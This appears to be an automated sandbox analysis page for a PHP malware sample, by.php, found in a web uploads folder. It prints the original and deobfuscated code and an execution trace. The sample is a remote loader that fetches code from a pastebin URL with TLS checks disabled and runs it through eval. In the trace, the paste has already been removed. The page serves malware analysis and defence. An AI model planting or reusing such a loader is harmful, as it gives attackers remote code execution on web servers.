by.php

md5: 86e3dbc1fae9e20cf76aa8015b1404b7

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Execution
eval (Deobfuscated, Original)

Title
Pastebin.com - Not Found (#404) (HTML)

URLs
https://pastebin.com/raw/UEa2xy6G (Deobfuscated, Original, Traces)

Deobfuscated PHP code
<?php

function get_contents($url)
{
    $ch = curl_init("{$url}");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $GLOBALS['coki']);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $GLOBALS['coki']);
    $result = curl_exec($ch);
    return $result;
}
$a = get_contents('https://pastebin.com/raw/UEa2xy6G');
eval('?>' . $a);
Execution traces
data/traces/86e3dbc1fae9e20cf76aa8015b1404b7_trace-1676261601.1756.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:13:47.073430]
1	0	1	0.000161	393464
1	3	0	0.000240	398632	{main}	1		/var/www/html/uploads/by.php	0	0
2	4	0	0.000258	398632	get_contents	1		/var/www/html/uploads/by.php	15	1	'https://pastebin.com/raw/UEa2xy6G'
3	5	0	0.000275	398632	curl_init	0		/var/www/html/uploads/by.php	3	1	'https://pastebin.com/raw/UEa2xy6G'
3	5	1	0.000297	399576
3	5	R			resource(3) of type (curl)
2		A						/var/www/html/uploads/by.php	3	$ch = resource(3) of type (curl)
3	6	0	0.000327	399544	curl_setopt	0		/var/www/html/uploads/by.php	4	3	resource(3) of type (curl)	19913	1
3	6	1	0.000342	399640
3	6	R			TRUE
3	7	0	0.000356	399544	curl_setopt	0		/var/www/html/uploads/by.php	5	3	resource(3) of type (curl)	52	1
3	7	1	0.000371	399640
3	7	R			TRUE
3	8	0	0.000383	399544	curl_setopt	0		/var/www/html/uploads/by.php	6	3	resource(3) of type (curl)	10018	'Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0'
3	8	1	0.000401	399640
3	8	R			TRUE
3	9	0	0.000414	399544	curl_setopt	0		/var/www/html/uploads/by.php	7	3	resource(3) of type (curl)	64	0
3	9	1	0.000428	399640
3	9	R			TRUE
3	10	0	0.000440	399544	curl_setopt	0		/var/www/html/uploads/by.php	8	3	resource(3) of type (curl)	81	0
3	10	1	0.000456	399640
3	10	R			TRUE
3	11	0	0.000494	399520	curl_setopt	0		/var/www/html/uploads/by.php	9	3	resource(3) of type (curl)	10082	NULL
3	11	1	0.000515	399616
3	11	R			TRUE
3	12	0	0.000535	399520	curl_setopt	0		/var/www/html/uploads/by.php	10	3	resource(3) of type (curl)	10031	NULL
3	12	1	0.000551	399616
3	12	R			TRUE
3	13	0	0.000563	399520	curl_exec	0		/var/www/html/uploads/by.php	11	1	resource(3) of type (curl)
3	13	1	0.045958	403648
3	13	R			'<!DOCTYPE html>\n<html lang="en">\n<head>\n    <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" />\n    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n    <title>Pastebin.com - Not Found (#404)</title>\n</head>\n<body>\n\n\n<h1>Not Found (#404)</h1>\n<p>This paste has been deemed potentially harmful. Pastebin took the necessary steps to prevent access on February 14, 2022, 7:01 pm CST. If you feel this is an incorrect assess'
2		A						/var/www/html/uploads/by.php	11	$result = '<!DOCTYPE html>\n<html lang="en">\n<head>\n    <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" />\n    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n    <title>Pastebin.com - Not Found (#404)</title>\n</head>\n<body>\n\n\n<h1>Not Found (#404)</h1>\n<p>This paste has been deemed potentially harmful. Pastebin took the necessary steps to prevent access on February 14, 2022, 7:01 pm CST. If you feel this is an incorrect assess'
2	4	1	0.046228	402704
2	4	R			'<!DOCTYPE html>\n<html lang="en">\n<head>\n    <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" />\n    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n    <title>Pastebin.com - Not Found (#404)</title>\n</head>\n<body>\n\n\n<h1>Not Found (#404)</h1>\n<p>This paste has been deemed potentially harmful. Pastebin took the necessary steps to prevent access on February 14, 2022, 7:01 pm CST. If you feel this is an incorrect assess'
1		A						/var/www/html/uploads/by.php	15	$a = '<!DOCTYPE html>\n<html lang="en">\n<head>\n    <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" />\n    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n    <title>Pastebin.com - Not Found (#404)</title>\n</head>\n<body>\n\n\n<h1>Not Found (#404)</h1>\n<p>This paste has been deemed potentially harmful. Pastebin took the necessary steps to prevent access on February 14, 2022, 7:01 pm CST. If you feel this is an incorrect assess'
2	14	0	0.046321	404688	eval	1	'?><!DOCTYPE html>\n<html lang="en">\n<head>\n    <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" />\n    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n    <title>Pastebin.com - Not Found (#404)</title>\n</head>\n<body>\n\n\n<h1>Not Found (#404)</h1>\n<p>This paste has been deemed potentially harmful. Pastebin took the necessary steps to prevent access on February 14, 2022, 7:01 pm CST. If you feel this is an incorrect assessment, please &lt;a href=&quot;/request-to-restore/UEa2xy6G&quot; target=&quot;blank&quot;&gt;contact us&lt;/a&gt; within 14 days to avoid any permanent loss of content.</p>\n\n</body>\n</html>'	/var/www/html/uploads/by.php	16	0
2	14	1	0.046371	404688
1	3	1	0.046385	403552
			0.046464	323392
TRACE END   [2023-02-13 02:13:47.119763]

Generated HTML code
<html lang="en"><head>
    <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <title>Pastebin.com - Not Found (#404)</title>
</head>
<body>


<h1>Not Found (#404)</h1>
<p>This paste has been deemed potentially harmful. Pastebin took the necessary steps to prevent access on February 14, 2022, 7:01 pm CST. If you feel this is an incorrect assessment, please &lt;a href="/request-to-restore/UEa2xy6G" target="blank"&gt;contact us&lt;/a&gt; within 14 days to avoid any permanent loss of content.</p>


</body></html>
Original PHP code
<?php
function get_contents($url){
  $ch = curl_init("$url");
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  curl_setopt($ch, CURLOPT_COOKIEJAR,$GLOBALS['coki']);
  curl_setopt($ch, CURLOPT_COOKIEFILE,$GLOBALS['coki']);
  $result = curl_exec($ch);
  return $result;
}

$a = get_contents('https://pastebin.com/raw/UEa2xy6G');
eval('?>'.$a);
PHP Malware Analysis

by.php

md5: 86e3dbc1fae9e20cf76aa8015b1404b7

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
